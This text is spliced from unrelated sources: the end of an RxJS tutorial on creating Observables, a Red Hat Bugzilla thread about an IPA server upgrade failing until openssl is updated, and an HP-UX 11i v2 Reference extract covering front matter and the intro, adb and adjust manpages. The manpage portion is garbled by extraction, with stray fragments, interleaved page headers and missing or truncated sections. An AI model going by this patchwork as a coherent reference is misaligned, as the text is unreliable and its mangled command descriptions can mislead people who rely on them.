It’s fairly simple, in the subscribe function, where you created a handler function which passes the values to the subscriber via object.next. This handler is attached as an event listener for that specific DOM node and event. In the unsubscribe method, you are removing the event listener to clean up.
Take a look at JSBin Demo.
The of method has the following signature:
of(value):Observable<T>;
Creates an Observable that emits some values you specified as arguments, immediately one after the other, and then emits a complete notification - RxJS Docs
Basically, it emits all the values that you have specified in arguments one by one and then completes. For example:
import { of } from 'rxjs'; of(1,2,3);
The above code creates an Observable which will emit 1,2,3 and then completes.
import { Observable } from 'rxjs'; function of(...values) { return Observable.create((observer) => { const handler = () => { values.forEach(val=> { observer.next(val); }); observer.complete(); }; handler(); }); }
Inside subscribe method, you created a handler function, which for Each over all the inputs of method and it fires observer.next with each input. Then it fires observer.complete() and finishes. And finally, we are calling handler function.
Take a look at JSBin Demo.
In this post, you have learned how to create Observable via create method. Along with that, you have learned why Observables are lazy. In the end, you also did a case study on RxJS’s fromEvent and of method.
Your email address will not be published. Required fields are marked * | https://www.zeolearn.com/magazine/learning-rxjs-by-creating-observables-introduction | CC-MAIN-2019-26 | en | refinedweb |
Hide Forgot
Upgrading the ipa packages fails if the required openssl version is not installed
When the user attempts to upgrade the *ipa* packages, Identity Management (IdM) does not automatically install the required version of the *openssl* packages. Consequently, if the 1.0.1e-42 version of *openssl* is not installed before the user runs the "yum update ipa*" command, the upgrade fails during the DNSKeySync service configuration.
To work around this problem, update *openssl* manually to version 1.0.1e-42 or later before updating *ipa*. This prevents the upgrade failure.
Description of problem:
IPA server upgrade fails from RHEL 7.0 to RHEL 7.2 using "yum update ipa* sssd"
Version-Release number of selected component (if applicable):
ipa-server-4.2.0-15.el7_2.3.x86_64
How reproducible: Always
Steps to Reproduce:
1. Setup RHEL7.0 host with IPA master
2. Add RHEl7.2 and RHEL 7.2 update repos on the system.
3. run yum update ipa* sssd
4. Verify the logs for yum update process along with ipaupgrade process.
# tail -f /var/log/messages
# tail -f /var/log/ipaupgrade.log
# tail -f /var/log/yum.log
Actual results:
1. After step4, Following error message is displayed during yum update process:)
Expected results:
ipa-server upgrade should be successful without any errors.
Additional info:
1. When the server is upgraded using "yum update" command, no error messages are observed and the server is upgraded successfully.
2. Also openssl is upgraded to latest version.(openssl-1.0.1e-42.el7_1.9.x86_64)
Created attachment 1100487 [details]
Workaround patch
Workaround: update openssl package first to version at least 1.0.1e-42. Then update ipa package.
(In reply to Martin Bašti from comment #2)
> Created attachment 1100487 [details]
> Workaround patch
Please just note that "Requires(pre)" does not supersede "Requires". You can for example delete such package after upgrade. So it may make sense to keep both Requires in the spec file.
Okay, so we may want to add Requires to softhsm.spec and Requires(pre) to ipa.spec. Is it a reasonable idea? Should I open a bug against softhsm?
Created attachment 1111451 [details]
Workaround patch update 1
Comment on attachment 1111451 [details]
Workaround patch update 1
Looks good, but we can stick with the old version if bug 1293340 is solved at the same time.
The patch has been acked
IPA server version: ipa-server-4.4.0-7.el7.x86_64
Tested the bug on the basis of following steps:
1. Tested that IPA server configured on RHEL 7.0 is upgraded from 7.0 to 7.3.
2. Noticed that ipaupgrade.log file is created at /var/log/ipaupgrade.log.
3. Noticed that var/log/ipaupgrade.log file is not updated.
See below:
[root@vm-idm-011 log]# rpm -q ipa-server
ipa-server-4.4.0-7.el7.x86_64
[root@vm-idm-011 log]# ls -al ipaupgrade.log
-rw-r--r--. 1 root root 0 Aug 10 17:59 ipaupgrade.log
[root@vm-idm-011 log]# cat ipaupgrade.log
[root@vm-idm-011 log]#
Thus on the basis of above observations, marking the status of bug to "ASSIGNED".
Can you provide more info?
Any output from yum upgrade?
Can you re-run ipa-server-upgrade?
Hi Martin,
Please find the details as below:
[root@vm-idm-011 log]# cat yum.log | grep ipa-server
Aug 10 13:25:33 Installed: ipa-tests-ipa-server-rhel70-shared-sgoveas.20150107141511-0.noarch
Aug 10 13:26:21 Installed: ipa-tests-ipa-server-rhel70-quickinstall-spoore.20140812195047-0.noarch
Aug 10 13:28:29 Installed: ipa-server-3.3.3-28.el7.x86_64
Aug 10 17:59:03 Installed: ipa-server-common-4.4.0-7.el7.noarch
Aug 10 17:59:05 Installed: ipa-server-4.4.0-7.el7.x86_64
Aug 10 17:59:06 Installed: ipa-server-dns-4.4.0-7.el7.noarch
On running ipa-server-upgrade I notice following:
[root@vm-idm-011 ~]# ipa-server-upgrade 28, in <module>
from requests.packages.urllib3.exceptions import InsecureRequestWarning
ImportError: No module named packages.urllib3.exceptions
Let me know if you need access to the machine.
This is a dogtag issue
File "/usr/lib/python2.7/site-packages/pki/client.py", line 28, in <module>
from requests.packages.urllib3.exceptions import InsecureRequestWarning
ImportError: No module named packages.urllib3.exceptions
There are already several bugs for that.
here:
I don't know how to handle this, but we cannot fix it on IPA side :)
If this is fixed with pki-core-10.3.3-5.el7, you can simply bump Requires in ipa and move this bug to ON_QA. No?
I don't know if it was fixed, bz1364071 is still ON_QA
The issue will be fixed in bug 1364071 and bug 1365572. Temporary workaround: update: python-requests to version >= 2.6.0
Both bug 1364071 and bug 1365572 are on QA which should fix the issue in comment 17.. | https://bugzilla.redhat.com/show_bug.cgi?id=1286635 | CC-MAIN-2019-26 | en | refinedweb |
Volume 1 of 9
Printed in USA
Legal Notices
The.
Use of this document and any supporting software media is restricted to
this product only. Additional copies of the programs may be made for
security and back-up purposes only. Resale of the programs, in their
present form or with alterations, is expressly prohibited.
Warranty
A copy of the specific warranty terms applicable to your Hewlett-Packard
product and replacement parts can be obtained from your local Sales and
Service Office.
Reproduction, adaptation, or translation of this document without prior
written permission is prohibited, except as allowed under the copyright
laws.
This document and the software it describes may also be protected under
one or more of the following copyrights. Additional copyrights are
acknowledged in some individual manpages.
of California.
ii
Trademark Notices
Intel and Itanium are registered trademarks of Intel Corporation in
the US and other countries and are used under license.
Java is a US trademark of Sun Microsystems, Inc.
Microsoft and MS-DOS are U.S. registered trademarks of Microsoft
Corporation.
OSF/Motif is a trademark of The Open Group in the US and other
countries.
UNIX is a registered trademark of The Open Group.
X Window System is a trademark of The Open Group.
iii
Revision History
This document’s printing date and part number indicate its edition. The
printing date changes when a new edition is printed. (Minor corrections
and updates which are incorporated at reprint do not cause the date to
change.) New editions of this manual incorporate all material updated
since the previous edition.
Part Number Date, Release, Format, Distribution
B2355-60103 August 2003. HP-UX release 11i version 2, one volume
HTML, docs.hp.com and Instant Information.
B2355-90779-87 August 2003. HP-UX release 11i version 2, nine
volumes PDF, docs.hp.com and print.
B9106-90010 June 2002. HP-UX release 11i version 1.6, one volume
HTML, docs.hp.com and Instant Information.
B9106-90007 June 2001. HP-UX release 11i version 1.5, seven
volumes HTML, docs.hp.com and Instant Information.
B2355-90688 December 2000. HP-UX release 11i version 1, nine
volumes.
B2355-90166 October 1997. HP-UX release 11.0, five volumes.
B2355-90128 July 1996. HP-UX release 10.20, five volumes, online
only.
B2355-90052 July 1995. HP-UX release 10.0, four volumes.
Conventions
We use the following typographical conventions.
audit (5) An HP-UX manpage. audit is the name and 5 is the
section in the HP-UX Reference. On the web and on the
Instant Information CD, it may be a hot link to the
iv
manpage itself. From the HP-UX command line, you
can enter “man audit” or “man 5 audit” to view the
manpage. See man (1).
Book Title The title of a book. On the web and on the Instant
Information CD, it may be a hot link to the book itself.
KeyCap The name of a keyboard key. Note that Return and Enter
both refer to the same key.
Emphasis Text that is emphasized.
Emphasis Text that is strongly emphasized.
ENVIRONVAR The name of an environment variable.
[ERRORNAME] The name of an error number, usually returned in the
errno variable.
Term The defined use of an important word or phrase.
ComputerOutput Text displayed by the computer.
UserInput Commands and other text that you type.
Command A command name or qualified command phrase.
Variable The name of a variable that you may replace in a
command or function or information in a display that
represents several possible values.
[ ] The contents are optional in formats and command
descriptions. If the contents are a list separated by |,
you may choose one of the items.
{ } The contents are required in formats and command
descriptions. If the contents are a list separated by |,
you must choose one of the items.
... The preceding element may be repeated an arbitrary
number of times.
| Separates items in a list of choices.
v
vi
Preface
HP-UX is the Hewlett-Packard Company’s implementation of an
operating system that is compatible with various industry standards. It
is based on the UNIX System V Release 4 operating system and
includes important features from the Fourth Berkeley Software
Distribution.
The nine volumes of this manual contain the system reference
documentation, made up of individual entries called manpages, named
for the man command that displays them on the system. The entries are
also known as manual pages or reference pages.
General For a general introduction to HP-UX and the structure and format of the
Introduction manpages, please see the introduction (9) manpage in volume 9.
Section The manpages are divided into sections that also have introduction
Introductions (intro) manpages that describe the contents. These are:
intro (1) Section 1: User Commands
(A-M in volume 1; N-Z in volume 2)
intro (1M) Section 1M: System Administration Commands
(A-M in volume 3; N-Z in volume 4)
intro (2) Section 2: System Calls
(in volume 5)
intro (3C) Section 3: Library Functions
(A-M in volume 6; N-Z in volume 7)
intro (4) Section 4: File Formats
(in volume 8)
intro (5) Section 5: Miscellaneous Topics
(in volume 9)
intro (7) Section 7: Device (Special) Files
(in volume 9)
intro (9) Section 9: General Information
(in volume 9)
vii
viii
Volume One
Table of Contents
Section 1
Volume One
Table of Contents
Section 1
Table of Contents
Volumes One and Two
User Commands
A-M
Section 1
Part 1
User Commands
A-M
intro(1) intro(1)
NAME
intro - introduction to command utilities and application programs
DESCRIPTION
This section describes commands accessible by users, as opposed to system calls in Section (2) or library
routines in Section (3), which are accessible by user programs.
Command Syntax
Unless otherwise noted, commands described in this section accept options and other arguments accord-
ing to the following syntax:
A A
name [ option ( s ) ] [ cmd_arg ( s ) ]
where the elements are defined as follows:
name Name of an executable file.
option One or more option s can appear on a command line. Each takes one of the following
forms:
-no_arg_letter
A single letter representing an option without an argument.
-no_arg_letters
Two or more single-letter options combined into a single command-line argu-
ment.
-arg_letter <>opt_arg
A single-letter option followed by a required argument where:
arg_letter
is the single letter representing an option that requires an argu-
ment,
opt_arg
is an argument (character string) satisfying the preceding
arg_letter ,
<> represents optional white space.
cmd_arg Path name (or other command argument) not beginning with -, or - by itself indicating
the standard input. If two or more cmd_arg s appear, they must be separated by white
space.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−1
intro(1) intro(1)
RETURN VALUE
Upon termination, each command returns two bytes of status, one supplied by the system giving the
cause for termination, and (in the case of ‘‘normal’’ ‘‘exit code’’, ‘‘exit status’’, ‘‘return code’’, or ‘‘return value’’, and are described only where
special conventions are involved.
WARNINGS
Some commands produce unexpected results when processing files containing null characters. These
commands often treat text input lines as strings, and therefore become confused when they encounter a
null character (the string terminator) within a line.
SEE ALSO
getopt(1), exit(2), wait(2), getopt(3C), hier(5), introduction(9).
Web access to HP-UX documentation at.
Section 1−−2 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
adb(1) adb(1)
NAME
adb - absolute debugger
SYNOPSIS
adb [-h]
adb [-n-o] [-w] [-I path ] kernelfile memfile
adb [-n-o] [-w] [-I path ] kernelfile crashdir
adb [-n-o] [-w] [-I path ] crashdir
adb [-n-o] [-w] [-I path ] [objfile ] [corefile ] A aA
adb [-n-o] [-w] [-I path ] -P pid [execfile ]
DESCRIPTION
The adb command executes a general-purpose debugging program that is sensitive to the underlying
architecture of the processor and operating system on which it is run It can be used to examine files and
provide a controlled environment for executing HP-UX programs.
adb inspects exactly one object file, referred to as the current object file, and one memory file, referred
to as the current memory file. Either of these files can be the NULL file, specified by the - argument,
which is a file with no contents. The object file and the memory file are specified using the following
arguments:
kernelfile An HP-UX kernel, usually vmunix.
memfile /dev/mem or /dev/kmem. memfile is assumed to be on an HP-UX system running
kernelfile if kernelfile is specified. /dev/mem is supported only on PA-RISC platforms.
crashdir A directory containing an HP-UX system crash dump, which is assumed to be produced from
kernelfile if kernelfile is specified.
objfile Normally an executable program file. It can also be a relocatable object file, shared library
file or a DLKM module. The default for objfile is a.out.
corefile A core image file produced after executing objfile . The default for corefile is core.
execfile The executable file corresponding to pid , the process ID of the process to be adopted for
debugging by adb.
The current object file may be any one of kernelfile , the vmunix file in crashdir , objfile , or execfile . The
current object file preferably should contain a symbol table; if it does not, the symbolic features of adb
cannot be used, although the file can still be examined. The current memory file may be any one of
memfile , the system memory dump in crashdir , corefile , or the memory of process pid .
Requests to adb are read from standard input and adb responds on standard output. If the -w flag is
present, objfile is created (if necessary) and opened for reading and writing, to be modified using adb.
adb ignores QUIT; INTERRUPT causes return to the next adb command.
There are two modes of operation for adb: backward compatibility mode and normal mode. Backward
compatibility mode is the default on PA-RISC systems. Normal mode is the default on Itanium systems.
On startup adb executes adb commands from the file $HOME/.adbrc.
To debug a MxN process or the core, adb requires the MxN debug library, libmxndbg. Depending on
the application type, it loads /usr/lib/libmxndbg.sl (for 32 bit PA-RISC systems) or
/usr/lib/libmxndbg64.sl (for 64 bit PA-RISC systems) or /usr/lib/hpux32/libmxndbg.so
(for Itanium(R)-based systems). If the relevant library is not found in the specified path, you should set
the shell variable ADB_PATHMXNDBG to the path where the correct library can be found.
Options
adb recognizes the following command-line options , which can appear in any order but must appear
before any file arguments:
-h Print a usage summary and exit. If this option is used, all other options and arguments are
ignored.
-i Ignores $HOME/.adbrc.
-I path path specifies a list of directories where files read with < or << (see below) are sought. This
list has the same syntax as, and similar semantics to, the PATH shell variable; the default is
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−3
adb(1) adb(1)
.:/usr/lib/adb.
-n Specify the normal mode. This is the default on Itanium systems. This option is mutually
exclusive with the -o option. The last one specified takes effect.
-o Specify backward compatibility mode. This is the default on PA-RISC systems. This option is
mutually exclusive with the -n option. The last one specified takes effect.
-P pid Adopt process with process ID pid as a ‘‘traced’’ process; see ttrace (2). This option is helpful
for debugging processes that were not originally run under the control of adb.
A aA -w This option must be specified to enable the file write commands of adb. Objfile is opened for
reading and writing. It also enables writes to memfile if it is a kernel memory file.
The following command-line options to adb are obsolete and are no longer required. (If used they gen-
erate a warning.)
-k Previously adb required this option to recognize HP-UX crash dumps or /dev/mem.
-m Previously adb required this option to recognize multiple file HP-UX crash dumps.
Requests to adb follow either the traditional form:
[address ] [ ,count ] [command-char ] [command-arguments] [;]
or the new form:
keyword [command-arguments] [;]
Only the traditional form is available in backward compatibility mode.
If address is present, dot is set to address . dot is the adb state variable which keeps track of the
current address. dotincr is another state variable which keeps track of increments to dot as adb
steps through a format string; see Format String below. Initially dot and dotincr are set to 0. For
most commands, count specifies the number of times the command is to be executed. The default count is
1. address and count are expressions.
The interpretation of an address depends on the context in which it is used. If a subprocess is being
debugged, addresses are interpreted in the address space of the subprocess. (For further details see
Address Mapping below.)
The command-char and command-arguments specify the command to run. See Commands below.
Expressions
All adb expression primaries are treated as 64-bit unsigned integers and the expression also evaluates to
a 64-bit unsigned integer. The following primaries are supported:
integer A number. The prefixes 0 (zero), 0o and 0O force interpretation in octal radix; the
prefixes 0t, OT, 0d, and 0D force interpretation in decimal radix; the prefixes 0x and
0X force interpretation in hexadecimal radix; the prefixes 0b and 0B force interpreta-
tion in binary radix. Thus 020 = 0d16 = 0x10 = 0b1000 = sixteen. If no prefix
appears, the default radix is used; see the d command. The radix is initialized to hexa-
decimal. Note that a hexadecimal number whose most significant digit would other-
wise be an alphabetic character must have a 0x (or 0X) prefix.
’cccccccc ’ The ASCII value of up to 8 characters. If more than 8 characters are specified, the
value is undefined. A backslash (\) can be used to escape a single quote (’).
$register Register. The value of the register is obtained from the register set corresponding to
the current memory file. Register names are implementation dependent; see the r
command.
symbol A symbol is a sequence of uppercase or lowercase letters, underscores, or digits, not
starting with a digit. A backslash (\) can be used to escape other characters. The
value of the symbol is taken from the symbol table in the current object file.
variable A variable name consists of alphabets and numerals and always starts with $. Names
of registers in the target processor are reserved as variable names and can be used to
access registers in expressions.
In backward compatibility mode, a variable is a single numeral or alphabet except for
registers and the prefix letter is >.
Section 1−−4 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
adb(1) adb(1)
Commands
As mentioned above, adb commands may be specified in the traditional form or the keyword form.
In backward compatibility mode, only the traditional form is supported.
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−5
adb(1) adb(1)
• Keyword commands
• Process commands
• Thread commands
• Shell commands
In backward compatibility mode:
• Variable commands
File commands
A aA These commands operate on the current object file or the current memory file and are used to read, write,
etc.
file_selector [ modifier ] [ ,size | index ] [arglist ]
The file_selector can be one of these:
? The selected file is the current object file.
/ The selected file is the current memory file.
= This special symbol is only used for printing the value of dot.
The modifier specifies the operation on the file; modifier can be:
(no modifier)
It takes a single optional argument list which is a format string. adb prints data from
the selected file according to the format string. If a format string is not present and the
file selector is ? or / then adb uses the format string used by either of these earlier.
If the file selector is = and a format string is not present, then adb uses the format
string used by the previous = command.
/ [ , size ] value [ mask ]
Search the selected file. Words of size, size starting at dot are masked with mask and
compared with value until a match is found. If found, dot is set to that address of
masked object. If mask is omitted, no mask is used. dotincr is set to 0. Valid
values of size are 1, 2, 4, 8. If no size is specified then sizeof(int) is assumed.
value and mask are unsigned integers of size size bytes.
For example: expr?/,4 6 5. Search for 4 byte value, 4 ( 6 & 5 ) in the current object
file, starting at expr .
= [ , size ] value1 value2 ...
Write a size sized value at the addressed location. dot is incremented by size after
each write. dotincr is set to 0. Values of size and values are same as for /
modifier. For this operation, the file should be opened with -w option.
For example: expr?=,4 6 5. Write 6 & 5 in the current object file at addresses expr
and expr +4 respectively, starting at expr .
> [ , index ] b e f
Set the index th mapping triple parameters of the selected file to the corresponding
argument values in order. Refer to Address Maps . If fewer than three arguments are
given, remaining maps remain unchanged. The arguments are expressions. If not
specified, index is assumed to be 0. For example: ?>,0 1 2 3 Set b, e, f (index 0)
of the current object file to 1, 2, 3 respectively.
In backward compatibility mode the following modifiers are also present.
* It has same behavior as that when no modifier is present. However, it uses the second
mapping triple to locate the file address of data to be printed.
l It has same behavior as modifier / with an implicit size of 2. It sets dotincr to 2.
L It has same behavior as modifier / with an implicit size of 4. It sets dotincr to 4.
w It has same behavior as modifier = with an implicit size of 2. It sets dotincr to 2. It
increments dot by the total size of all the values written minus dotincr.
W It has same behavior as modifier / with an implicit size of 4. It sets dotincr to 4.
dot is set as for w.
Section 1−−6 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
adb(1) adb(1)
Keyword Commands
Run the Keyword Command Form using the traditional command form by prefixing the command with $.
Please refer to Keyword Form Commands for the complete list of keyword commands.
Process Commands
These commands deal with managing subprocesses. adb can run an object file as a subprocess. Also, it A aA
can adopt a subprocess given its pid. adb can debug multi-threaded and/or forked subprocesses. It can
also debug multiple subprocesses at the same time. However, at any time it focuses on a one subprocess
and one of its threads called the current subprocess and current thread respectively.
The command consists of : followed by the modifier and an optional list of arguments. They are:
r [ objfile ] Run objfile as a subprocess. If address is given explicitly, the program is entered at
this point; otherwise the program is entered at its standard entry point. The value
count specifies how many breakpoints are ignored before stopping. arguments to the
subprocess may be supplied on the same line as the command. Semicolon is not used
as a command separator. An argument starting with < or > causes the standard input
or output to be established for the command. All signals are turned on when entering
the subprocess. Such a subprocess is referred to as a created subprocess.
If there are other created subprocesses running, all are killed. It does not kill any
attached subprocesses. This becomes the current subprocess.
e [ objfile ] Set up a subprocess as in :r; no instructions are executed.
a [ objfile ] Causes adb to adopt process with pid as a traced subprocess. If the objfile is specified,
adb uses it to lookup symbol information. Count has same meaning as in :r. Such a
subprocess is referred to as an attached subprocess. This subprocess becomes the
current subprocess.
k [ pid | * ]
Kills a created subprocess. If no argument is specified it kills the current subprocess.
If a pid is given, it kills the subprocess with that pid . If * is given, it kills all created
subprocesses.
The current subprocess is chosen from the remaining subprocesses.
de [ pid | * ]
The arguments can be a pid or a *. Same as :k, however it applies to attached sub-
processes. adb detaches from them.
c [ signal ] Continues the current subprocess with signal signal . It continues all the threads of the
subprocess. If no signal is specified, the signal that caused it to stop is sent. If address
is specified, the current thread continues at this address. Breakpoint skipping is the
same as for :r.
s [ signal | arg1 arg2 ... ]
Step the current thread count times. If address is given, then the thread continues at
that address , else from the address where it had stopped. If no signal is specified, the
signal that caused it to stop is sent. If there is no current subprocess, object file is run
as a subprocess as for :r. In this case no signal can be sent; the remainder of the line
is treated as arguments to the subprocess.
b [ command ]
Sets breakpoint at address in the current subprocess The breakpoint is executed
count -1 times before causing a stop. Each time the breakpoint is encountered, the
command is executed. This breakpoint is a subprocess breakpoint. If any of the thread
executes the instruction at this address , it will stop. Multiple breakpoints can be set at
the same address .
d [ num | * ]
Deletes all breakpoints at address in the current subprocess, if it is specified. If * is
specified, it deletes all the current subprocess breakpoints. If num is specified, break-
point with number num is deleted.
HP-UX 11i Version 2: August 2003 −5− Hewlett-Packard Company Section 1−−7
adb(1) adb(1)
en [ num | * ]
Enables all breakpoints at address in the current subprocess, if it is specified. If * is
specified, it enables all the current subprocess breakpoints. If num is specified, break-
point with number num is enabled.
di [ num | * ]
Disables all breakpoints at address in the current subprocess, if it is specified. If * is
specified, it disables all the current subprocess breakpoints. If num is specified, break-
point with number num is disabled.
A aA z signum [ +s | -s | +r | -r | +d | -d ]
Changes signal handling for a specified signum for all the threads of the current sub-
process. Disposition can be specified as:
+s Stop subprocess when signum is received.
-s Do not stop subprocess when signum is received.
+r Report when signum is received.
-r Do not report when signum is received.
+d Deliver signum to the target subprocess .
-d Do not deliver signal to the target subprocess .
w [ pid ] Switches from the current subprocess to the subprocess with process ID pid . This pro-
cess becomes the current subprocess. This subprocess must be an already attached or
created subprocess. Both subprocesses are in stopped state after this command.
wc [ pid ] Same as w however the previous current subprocess is not stopped.
Thread Commands
These commands manage the threads in the current subprocess. The command consists of a ] followed
by a modifier and an optional argument list.
s [ signum ] Same as :s. However it is strictly for the current thread only.
c [ signum ] Same as :c. However it continues only the current thread. And count refers to the
breakpoint to skip for the current thread.
b [ command ] Same as :b. However it applies to the current thread only.
d [ num | * ] Same as :d. However it applies to current thread only.
en [ num | * ] Same as :en. However it applies to the current thread only.
di [ num | * ] Same as :di. However it applies to the current thread only.
z signum [ +s | -s | +r | -r | +d | -d ]
Same as :z. However it is meant for the current thread only. If a signum occurs in the
context of this thread this disposition value is used instead of that of the subprocess.
es [ signum ] Sets the flag for this signum for the current thread. It means that if this signal signum
occurs in the context of this thread’s signal disposition value is used instead of that of the
subprocess.
w [ pid ] Switch from the current thread to some other thread. Both the threads are in stopped
state after this, and the thread with threadid becomes the current thread. This com-
mand is also applicable to core file debugging. It switches from present thread to given
thread and makes the given thread as the current thread.
Shell Commands
This action consists of a ! character followed by a string . The string is passed unchanged to the shell
defined by the SHELL environment variable or to /bin/sh.
Variable Commands
This is supported in backward compatibility mode only. It consists of a > followed by a variable , var and
an optional value . This action assigns value to the variable or register named by var .
If not specified, value is assumed to be the value of dot. This behavior is deprecated.
Section 1−−8 Hewlett-Packard Company −6− HP-UX 11i Version 2: August 2003
adb(1) adb(1)
HP-UX 11i Version 2: August 2003 −7− Hewlett-Packard Company Section 1−−9
adb(1) adb(1)
A aA n [ nodenumber ]
Without arguments print node information on a CCNUMA machine. With a
nodenumber argument, change to that node.
p traditional_cmd
This keyword command takes a traditional command as argument and interprets it.
a var value Assign value to adb variable var .
pa Virtual_Offset
Prints the physical address for a given Virtual Offset in HEX format. Space ID is
taken from the adb variable space. You can set the adb variable space using the key-
word command a explained earlier.
The following commands can run only in backward compatibility mode.
newline Print the process ID and register values.
M Toggle the address mapping of memfile between the initial map set up or a valid
memory file and the default mapping pair which the user can modify with the file
action modifier >. If the memory file was invalid, only the default mapping is avail-
able.
N [ nodenumber ]
Print the number of nodes on V-class multinode machines and the current node
number. To switch to another node, enter $N nodenumber.
F Print double precision floating point registers.
R Print all registers.
U Print unwind tables.
Format String
A format string is used to specify the formatting to be done before data is printed by adb. There are
two types of format strings supported by adb: traditional style and printf style. A traditional style
format string is a sequence of format specifiers. A printf-style format string is always preceded by a
comma (,) and enclosed within double quotes (""), and is a sequence of format specifiers and other char-
acters. Each format specifier should be preceded by a % character. Characters other than format
specifiers are printed as is. If needed, % should be escaped by %. It supports C language style \ charac-
ter escape sequences.
While processing a format string, adb scans the format string from left to right and applies each conver-
sion specifier encountered to the object addressed by the sum of dot and dotincr. After each
conversion specifier is processed, dotincr is incremented by count times size (implicit or explicit) of
that conversion specifier. If the format string is used to print the value of dot (using action =), dot
and dotincr remain unchanged. For dotincr operator, dotincr is updated appropriately.
In backward compatibility mode, only the traditional style format string is supported.
Format Specifier
A format specifier can be a conversion specifier or a dot operator.
1. Conversion Specifier
Each conversion specifier consists of an optional count or pspec followed by an optional size specifier char-
acter , followed by a conversion specifier character .
count This is available only for the traditional style format string. The count specifies the number of
times this conversion specifier is to be repeated. If not specified, count is assumed to be 1.
Section 1−−10 Hewlett-Packard Company −8− HP-UX 11i Version 2: August 2003
adb(1) adb(1)
pspec This is available only for the printf-style format string. It is a sequence of flags, fieldwidth and
precision as in the printf (3S) library function.
size specifier character
This specifies the size of object to which this is applied. Size can be specified in two ways. One is
using absolute size specifier and other is relative size specifier. Absolute size specifiers are as fol-
lows.
b The size of the object is 1 byte.
e The size of the object is 2 bytes.
g The size of the object is 4 bytes. A aA
j The size of the object is 8 bytes.
k The size of the object is 16 bytes.
Relative size specifiers are as follows
w The size of the object is the size of a machine word of the target processor.
h The size of the object is half the size of a machine word of the target processor.
l The size of the object is double the size of a machine word of the target processor.
n The size of the object is the size of a pointer on the target processor. This will be different for
wide files and narrow files.
m The size of the object is the size of an instruction of the target processor. This will be sup-
ported only on processors where this is constant.
Conversion Specifier Character
The following characters are supported
a The value of dot is printed in symbolic form.
c The object is printed as a character.
o The object is printed as an unsigned octal number.
d The object is printed as a signed decimal number.
u The object is printed as an unsigned decimal number.
i The object is disassembled as an instruction and printed.
f The object is printed in a floating point format according to its size.
p The object is printed in symbolic form.
s The object is assumed to be a null terminated string and printed. This cannot be used to
print dot.
y The object is cast to type time_t and printed in the ctime (3C) format.
Here the printf-style format strings support only c, o, d, u, x, f, and s. If the size specifier
character is not specified, it is assumed to be b for conversion character c; w for conversion char-
acters d, u, x, o, and f; m for i; sizeof(time_t) for y; and w for everything else.
For example. 10=2bo, ’abc’=,"%s", main?4i
2. Dot Operator
A dot operator consists of an optional count , optional size specifier character , and a dot operator charac-
ter .
count count specifies the number of times this dot operator is to be repeated. If not specified, count
is assumed to be 1. The count is always 1 for printf-style format strings.
Size Specifier Character
Same as size specifier character of conversion specifier.
Dot operator character
This can be one of these
v Increment dotincr by count times size.
HP-UX 11i Version 2: August 2003 −9− Hewlett-Packard Company Section 1−−11
adb(1) adb(1)
Address Maps
In files like object files and application core files, the virtual memory address is the not the same as the
file offset. So adb keeps an array of address maps for these files to map a given virtual memory address
to a file offset. Each address map is a triple: start virtual address (b), end virtual address (e) and start
file offset (f). The triple specifies that all addresses from b to e - 1 occupy a contiguous region in the file
starting at f. Given a virtual address a such that b≤ a< e, the file offset of a can be computed as f+ a- b.
State variables
There are several variables which define the state of adb at any instant in time. They are:
dot Current address. Initial value is 0.
dotincr Current address increment. Initial value is 0.
prompt Prompt string used by adb. Initial value is ‘‘adb> ’’.
radix The current input radix. Initial value is as in the assembly language of the target proces-
sor.
maxwidth The maximum width of the display. Initial value is 80.
maxoffset If an address is within this limit from a known symbol, adb prints the address as
symbol_name +offset , else the address is printed. Initial value is 0xffffffff.
macropath List of directories to be searched for adb macros. Initial value is .:/usr/lib/adb.
pager Pager command used by adb. Initial value is more -c.
backcompat Set to 1 if adb is in backward compatibility mode. Initial value depends on the host pro-
cessor.
Note
adb64 is a symbolic link to adb. This symbolic link is maintained for backward compatibility with some
old scripts which may be using adb64.
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
RETURN VALUE
A aA adb comments about inaccessible files, syntax errors, abnormal termination of commands, etc. Exit
status is 0 unless the last command failed or returned non-zero status.
AUTHOR
adb was developed by HP.
FILES
a.out
core
/dev/mem
/dev/kmem
SEE ALSO
ttrace(2), crt0(3), ctime(3C), end(3C), a.out(4), core(4), signal(5).
ADB Tutorial
NAME
adjust - simple text formatter
SYNOPSIS
adjust [-b] [-c|-j|-r ] [-m column ] [-t tabsize ] [ files ... ]
DESCRIPTION
The adjust command is a simple text formatter for filling, centering, left and right justifying, or only
right justifying text paragraphs, and is designed for interactive use. It reads the concatenation of input
files (or standard input if none are given) and produces on standard output a formatted version of its
input, with each paragraph formatted separately. If - is given as an input filename, adjust reads stan- A aA
dard input at that point (use - - as an argument to separate - from options.)
adjust reads text from input lines as a series of words separated by space characters, tabs, or newlines.
Text lines are grouped into paragraphs separated by blank lines. By default, text is copied directly to the
output, subject only to simple filling (see below) with a right margin of 72, and leading spaces are con-
verted to tabs where possible.
Options
The adjust command recognizes the following command-line options:
-b Do not convert leading space characters to tabs on output; (output contains no tabs, even
if there were tabs in input).
-c Center text on each line. Lines are pre- and post-processed, but no filling is performed.
-j Justify text. After filling, insert spaces in each line as needed to right justify it (except in
the last line of each paragraph) while keeping the justified left margin.
-r After filling text, adjust the indentation of each line for a smooth right margin (ragged
left margin).
-mcolumn
Set the right fill margin to the given column number, instead of 72. Text is filled, and
optionally right justified, so that no output line extends beyond this column (if possible).
If -m0 is given, the current right margin of the first line of each paragraph is used for
that and all subsequent lines in the paragraph.
By default, text is centered on column 40. With -c, the -m option sets the middle column
of the centering ‘‘window’’, but -m0 auto-sets the right side as before (which then deter-
mines the center of the ‘‘window’’).
-ttabsize Set the tab size to other than the default (eight columns).
Only one of the -c, -j, and -r options is allowed in a single command line.
Details
Before doing anything else to a line of input text, adjust first handles backspaces, rubbing out preced-
ing characters in the usual way. Next, it ignores all non-printable characters except tab. It then expands
all tabs to spaces.
For simple text filling, the first word of the first line of each paragraph is indented the same amount as in
the input line. Each word is then carried to the output followed by one space. ‘‘Words’’ ending in
terminal_character[quote ][closing_character] are followed by two spaces, where terminal_character is
any of ., :, ?, or !; quote is a single closing quote ( ’ ) character or double-quote character ( " ), and close
is any of ), ], or }. Here are some examples:
end. of? sentence.’ sorts!" of.) words?"]
